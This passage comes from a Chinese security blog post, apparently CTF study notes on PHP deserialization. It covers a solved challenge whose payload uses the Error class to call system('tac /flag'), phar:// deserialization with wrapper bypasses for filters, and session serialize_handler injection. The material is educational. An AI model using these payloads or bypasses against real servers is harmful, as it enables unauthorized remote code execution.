&amp;&amp; <span class="variable">$ser_b1</span> != <span class="variable">$ser_b2</span>) &#123;</span><br><span class="line">    (<span class="variable">$obj_a2</span>-&gt;<span class="variable">$c</span>())(<span class="variable">$obj_b2</span>-&gt;<span class="variable">$c</span>());</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里涉及到一个小trick,当序列化时候，发现类未定义，就会由属性 PHP_Incomplete_Class来存储类名。当其在反序列化时候，就会将PHP_Incomplete_Class来作为类名，而$PHP_Incomplete_Class_Name这个属性用来存储类名。然后再次序列化，就会读取$PHP_Incomplete_Class_Name这个属性，将其内容作为序列化后的类名，如果这个类名仍未定义，则仍旧是__PHP_Incomplete_Class。而题目中没有定义类，因此想要绕过，我们需要用到php的内置类。例如，</p>
<p>a&#x3D;O:1:”A”:2:{s:1:”a”;s:1:”b”;s:27:”__PHP_Incomplete_Class_Name”;s:5:”Error”;}，</p>
<p>此时get_class($obj_a1)&#x3D;__PHP_Incomplete_Class，而get_class($obj_a2)&#x3D;Error, 从而绕过die，进行执行。</p>
<p>然后我们来看($obj_a2-&gt;$c())($obj_b2-&gt;$c());</p>
<p>Error类中有一个属性message,带有方法getMessage,可以返回message的内容，这是我们可以操控的。所以当$c&#x3D;getMessage时候，我将题目简化成了这样。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$a($b);</span><br></pre></td></tr></table></figure>

<p>其实就是简单的命令执行了，payload 如下。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">a=O:1:&quot;A&quot;:2:&#123;s:7:&quot;message&quot;;s:6:&quot;system&quot;;s:27:&quot;__PHP_Incomplete_Class_Name&quot;;s:5:&quot;Error&quot;;&#125;</span><br><span class="line">&amp;b=O:1:&quot;A&quot;:2:&#123;s:7:&quot;message&quot;;s:9:&quot;tac /flag&quot;;s:27:&quot;__PHP_Incomplete_Class_Name&quot;;s:5:&quot;Error&quot;;&#125;</span><br><span class="line">&amp;c=getMessage</span><br></pre></td></tr></table></figure>

<p>执行命令system(“tac &#x2F;flag”),获得flag。</p>
<h3 id="5-phar反序列化"><a href="#5-phar反序列化" class="headerlink" title="5.phar反序列化"></a>5.phar反序列化</h3><p>phar反序列化即在文件系统函数（file_exists()、is_dir()等）参数可控的情况下，配合phar:&#x2F;&#x2F;伪协议，可以不依赖unserialize()直接进行反序列化操作。<br>具体文章<a target="_blank" rel="noopener" href="https://paper.seebug.org/680/">https://paper.seebug.org/680/</a><br>首先了解一下phar文件的结构，一个phar文件由四部分构成：</p>
<ul>
<li>a stub：可以理解为一个标志，格式为xxx<?php xxx; **HALT_COMPILER();?>，前面内容不限，但必须以**HALT_COMPILER();?&gt;来结尾，否则phar扩展将无法识别这个文件为phar文件。</li>
<li>a manifest describing the contents：phar文件本质上是一种压缩文件，其中每个被压缩文件的权限、属性等信息都放在这部分。这部分还会以序列化的形式存储用户自定义的meta-data，这是上述攻击手法最核心的地方。</li>
<li>the file contents：被压缩文件的内容。</li>
<li>[optional] a signature for verifying Phar integrity (phar file format only)：签名，放在文件末尾</li>
</ul>
<p>通俗的理解就是php文件系统很大一部分函数经过phar:&#x2F;&#x2F;解析时，存在着对meta-data（在这里<meta-data>区域面搞反序列化的pop链）反序列化的操做。</meta-data></p>
<h4 id="要求"><a href="#要求" class="headerlink" title="要求"></a>要求</h4><p>1、phar文件可上传<br>2、文件流操作函数如file_exists(),file_get_contents()等影响函数要有可利用的魔术方法做跳板<br>3、文件流参数可控，且phar:&#x2F;&#x2F;没有被过滤，或可绕过</p>
<p><img src="Users\30882\Desktop\个人博客\source\images\img\php反序列化整理\1..png" alt="1." loading="lazy"></p>
<h4 id="绕过方法"><a href="#绕过方法" class="headerlink" title="绕过方法"></a>绕过方法</h4><p>（1）phar:&#x2F;&#x2F;被过滤<br>有以下几种方法可以绕过：</p>
<ul>
<li>compress.bzip2:&#x2F;&#x2F;phar:&#x2F;&#x2F;</li>
<li>compress.zlib:&#x2F;&#x2F;phar:&#x2F;&#x2F;&#x2F;</li>
<li>php:&#x2F;&#x2F;filter&#x2F;resource&#x3D;phar:&#x2F;&#x2F;</li>
<li>$z &#x3D; ‘compress.bzip2:&#x2F;&#x2F;phar:&#x2F;&#x2F;&#x2F;home&#x2F;sx&#x2F;test.phar&#x2F;test.txt’;</li>
</ul>
<p>（2）除此之外，我们还可以将phar伪造成其他格式的文件。<br>php识别phar文件是通过其文件头的stub，更确切一点来说是__HALT_COMPILER();?&gt;这段代码，对前面的内容或者后缀名是没有要求的。那么我们就可以通过添加任意的文件头+修改后缀名的方式将phar文件伪装成其他格式的文件。如下：</p>
<h3 id="6-session反序列化"><a href="#6-session反序列化" class="headerlink" title="6.session反序列化"></a>6.session反序列化</h3><p>理解php的session之前先了解一下session是什么，这里引用百度的描述，比较官方<br><strong>Session：</strong><br>在计算机中，尤其是在网络应用中，称为“会话控制”。Session对象存储特定用户会话所需的属性及配置信息。这样，当用户在应用程序的Web页之间跳转时，存储在Session对象中的变量将不会丢失，而是在整个用户会话中一直存在下去。当用户请求来自应用程序的 Web页时，如果该用户还没有会话，则Web服务器将自动创建一个 Session对象。当会话过期或被放弃后，服务器将终止该会话。Session 对象最常见的一个用法就是存储用户的首选项。例如，如果用户指明不喜欢查看图形，就可以将该信息存储在Session对象中。不过不同语言的会话机制可能有所不同。</p>
<p><strong>PHP session：</strong><br>可以看做是一个特殊的变量，且该变量是用于存储关于用户会话的信息，或者更改用户会话的设置，需要注意的是，PHP Session 变量存储单一用户的信息，并且对于应用程序中的所有页面都是可用的，且其对应的具体 session 值会存储于服务器端，这也是与 cookie的主要区别，所以seesion 的安全性相对较高。</p>
<p><strong>session的工作流程：</strong><br>当第一次访问网站时，Seesion_start()函数就会创建一个唯一的Session ID，并自动通过HTTP的响应头，将这个Session ID保存到客户端Cookie中。同时，也在服务器端创建一个以Session ID命名的文件，用于保存这个用户的会话信息。当同一个用户再次访问这个网站时，也会自动通过HTTP的请求头将Cookie中保存的Seesion ID再携带过来，这时Session_start()函数就不会再去分配一个新的Session ID，而是在服务器的硬盘中去寻找和这个Session ID同名的Session文件，将这之前为这个用户保存的会话信息读出，在当前脚本中应用，达到跟踪这个用户的目的。</p>
<p><strong>seesion_start()的作用：</strong><br>当会话自动开始或者通过 session_start() 手动开始的时候， PHP 内部会依据客户端传来的PHPSESSID来获取现有的对应的会话数据（即session文件）， PHP 会自动反序列化session文件的内容，并将之填充到 $_SESSION 超级全局变量中。如果不存在对应的会话数据，则创建名为PHPSESSID(客户端传来的)的文件。如果客户端未发送PHPSESSID，则创建一个由32个字母组成的PHPSESSID，并返回set-cookie。</p>
<p><strong>php.ini中一些Session配置：</strong><br>1、session.save_path&#x3D;”” –设置session的存储路径<br>2、session.save_handler&#x3D;””–设定用户自定义存储函数，如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式)<br>3、session.auto_start boolen–指定会话模块是否在请求开始时启动一个会话默认为0不启动<br>4、session.serialize_handler string–定义用来序列化&#x2F;反序列化的处理器名字。默认使用php</p>
<p><strong>常见的php-session存放位置有</strong>：<br>1、&#x2F;var&#x2F;lib&#x2F;php5&#x2F;sess_PHPSESSID<br>2、&#x2F;var&#x2F;lib&#x2F;php7&#x2F;sess_PHPSESSID<br>3、&#x2F;var&#x2F;lib&#x2F;php&#x2F;sess_PHPSESSID<br>4、&#x2F;tmp&#x2F;sess_PHPSESSID 5 &#x2F;tmp&#x2F;sessions&#x2F;sess_PHPSESSED<br>5、phpstudy集成环境下在php.ini里查找session.save_path，也可以在这里更改路径</p>
<p><strong>session.serialize_handler定义的引擎有三种，如下表所示：</strong></p>
<table>
<thead>
<tr>
<th><strong>处理器名称</strong></th>
<th><strong>存储格式</strong></th>
</tr>
</thead>
<tbody><tr>
<td>php</td>
<td>键名 + 竖线 + 经过serialize()函数序列化处理的值</td>
</tr>
<tr>
<td>php_binary</td>
<td>键名的长度对应的 ASCII 字符 + 键名 + 经过serialize()函数序列化处理的值</td>
</tr>
<tr>
<td>php_serialize</td>
<td>经过serialize()函数序列化处理的数组</td>
</tr>
</tbody></table>
<p><strong>注：自 PHP 5.5.4 起可以使用 _php*serialize*</strong><br>上述三种处理器中，php_serialize在内部简单地直接使用 serialize&#x2F;unserialize函数，并且不会有php和 php_binary所具有的限制。 使用较旧的序列化处理器导致$_SESSION 的索引既不能是数字也不能包含特殊字符(| 和 !) 。<br>注：查看版本，注意：在php 5.5.4以前默认选择的是php，5.5.4之后就是php_serialize,这里面是php_serialize,同时意识到 在index界面的时候，设置选择的是php，因此可能会造成漏洞<br>下面我们实例来看看三种不同处理器序列化后的结果。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">ini_set(&#x27;session.serialize_handler&#x27;, &#x27;php&#x27;);</span><br><span class="line">//ini_set(&quot;session.serialize_handler&quot;, &quot;php_serialize&quot;);</span><br><span class="line">//ini_set(&quot;session.serialize_handler&quot;, &quot;php_binary&quot;);</span><br><span class="line">session_start();</span><br><span class="line">$_SESSION[&#x27;lemon&#x27;] = $_GET[&#x27;a&#x27;];</span><br><span class="line">echo &quot;&lt;pre&gt;&quot;;</span><br><span class="line">var_dump($_SESSION);</span><br><span class="line">echo &quot;&lt;/pre&gt;&quot;;</span><br></pre></td></tr></table></figure>

<p>比如这里我get进去一个值为abc,查看一下各个存储格式：</p>
<ul>
<li>php : lemon|s:3:”abc”;</li>
<li>php_serialize : a:1:{s:5:”lemon”;s:3:”abc”;}</li>
<li>php_binary : lemons:3:”abc”;</li>
</ul>
<p>这有什么问题，其实PHP中的Session的实现是没有的问题，危害主要是由于程序员的Session使用不当而引起的。如：使用不同引擎来处理session文件。</p>
<h3 id="漏洞造成原理："><a href="#漏洞造成原理：" class="headerlink" title="漏洞造成原理："></a>漏洞造成原理：</h3><p>前面的前置知识没理解没关系，我们直接先看看漏洞如何造成的，这里涉及的其实是这两个处理器<br>&#x2F;&#x2F;ini_set(‘session.serialize_handler’, ‘php’);<br>&#x2F;&#x2F;ini_set(“session.serialize_handler”, “php_serialize”);<br>当php_serialize处理器处理接收session，php处理器处理session时便会造成反序列化的可利用，因为php处理器是有一个|间隔符，当php_serialize处理器传入时在序列化字符串前加上|，|O:7:”xiaoxin”:1:{s:4:”name”;s:7:”xiaoxin”;}”<br>此时session值为<strong><em>a:1:{s:7:”session”;s:44:”|O:7:”xiaoxin:1:{s:4:”name”;s:7:”xiaoxin”;}”;}*<strong>当php处理器处理时，会把|当作间隔符，取出后面的值去反序列化，即是我们构造的payload：</strong></em>|O:7:”xiaoxin:1:{s:4:”name”;s:7:”xiaoxin”;}”*</strong></p>
</div></section><div id="reward-container"><span class="hty-icon-button button-glow" id="reward-button" title="打赏" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === &quot;none&quot;) ? &quot;block&quot; : &quot;none&quot;;"><span class="icon iconify" data-icon="ri:hand-coin-line"></span></span><div id="reward-comment">I'm so cute. Please give me money.</div></div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>伊卡洛维奇</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="http://lunereal.1kal0vic.top/2026/02/26/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" title="php反序列化知识处理">http://lunereal.1kal0vic.top/2026/02/26/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><span class="icon iconify" data-icon="ri:creative-commons-line"></span><span class="icon iconify" data-icon="ri:creative-commons-by-line"></span><span class="icon iconify" data-icon="ri:creative-commons-nc-line"></span><span class="icon iconify" data-icon="ri:creative-commons-sa-line"></span></a> 许可协议。</li></ul></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/2026/02/27/ssti/" rel="prev" title="ssti"><span class="icon iconify" data-icon="ri:arrow-left-s-line"></span><span class="post-nav-text">ssti</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/2026/02/21/sql%E6%B3%A8%E5%85%A5/" rel="next" title="sql注入整理"><span class="post-nav-text">sql注入整理</span><span class="icon iconify" data-icon="ri:arrow-right-s-line"></span></a></div></div></div><div class="hty-card" id="comment"></div></main><footer class="sidebar-translate" id="footer"><div class="copyright"><span>&copy; 2024 – 2026 </span><span class="with-love" id="animate"><span class="icon iconify" data-icon="ri:cloud-line"></span></span><span class="author"> 伊卡洛维奇</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v7.3.0</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.10.11</span></div><div class="live-time"><span>感谢陪伴</span><span id="display_live_time"></span><span class="moe-text">(●'◡'●)</span><script>function blog_live_time() {
  setTimeout(blog_live_time, 1000);
  const start = new Date('2024-03-20T00:00:00');
  const now = new Date();
  const timeDiff = (now.getTime() - start.getTime());
  const msPerMinute = 60 * 1000;
  const msPerHour = 60 * msPerMinute;
  const msPerDay = 24 * msPerHour;
  const passDay = Math.floor(timeDiff / msPerDay);
  const passHour = Math.floor((timeDiff % msPerDay) / 60 / 60 / 1000);
  const passMinute = Math.floor((timeDiff % msPerHour) / 60 / 1000);
  const passSecond = Math.floor((timeDiff % msPerMinute) / 1000);
  display_live_time.innerHTML = ` ${passDay} 天 ${passHour} 小时 ${passMinute} 分 ${passSecond} 秒`;
}
blog_live_time();
</script></div><div class="footer-custom-text">YourText <a href="yourLink" rel="noopener" target="_blank">Description</a></div><div class="footer-support"><span>本站由</span><a class="footer-support-logo" href="https://www.rainyun.com/YeMeng_" target="blank" title="雨云"><img height="30" src="https://cn-sy1.rains3.com/yemenghexo/rainyunlogo.png" alt="雨云"></a><span>提供 对象存储 服务</span></div></footer></div><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><span class="icon iconify" data-icon="ri:arrow-up-s-line"></span><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#0078E7" stroke-width="2" stroke-linecap="round"></circle></svg></a><script src="https://fastly.jsdelivr.net/npm/medium-zoom@1.0.6/dist/medium-zoom.min.js"></script><script>const images = [...document.querySelectorAll('.markdown-body img')]
mediumZoom(images)</script><style>.medium-zoom-image {
  z-index: 99;
}</style></body></html>